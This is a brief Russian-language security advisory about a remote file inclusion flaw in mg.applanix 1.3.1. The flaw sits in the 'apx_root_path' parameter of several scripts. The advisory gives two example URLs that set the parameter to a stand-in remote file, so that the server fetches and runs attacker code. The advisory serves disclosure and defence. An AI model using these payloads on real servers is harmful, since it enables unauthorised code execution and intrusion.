Программа: mg.applanix 1.3.1
Уязвимость позволяет злоумышленнику выполнить произвольный сценарий на целевой системе. Уязвимость существует из-за ошибки в обработке входных данных в параметре «apx_root_path» множественными сценариями. Атакующий может выполнить произвольный сценарий в контексте безопасности Web сервера.
Примеры:
http://localhost/path/act/act_check_access.php?apx_root_path=http://EvElCoDe.txt?
http://localhost/path/dsp/dsp_form_booking_ctl.php?apx_root_path=http://EvElCoDe.txt?
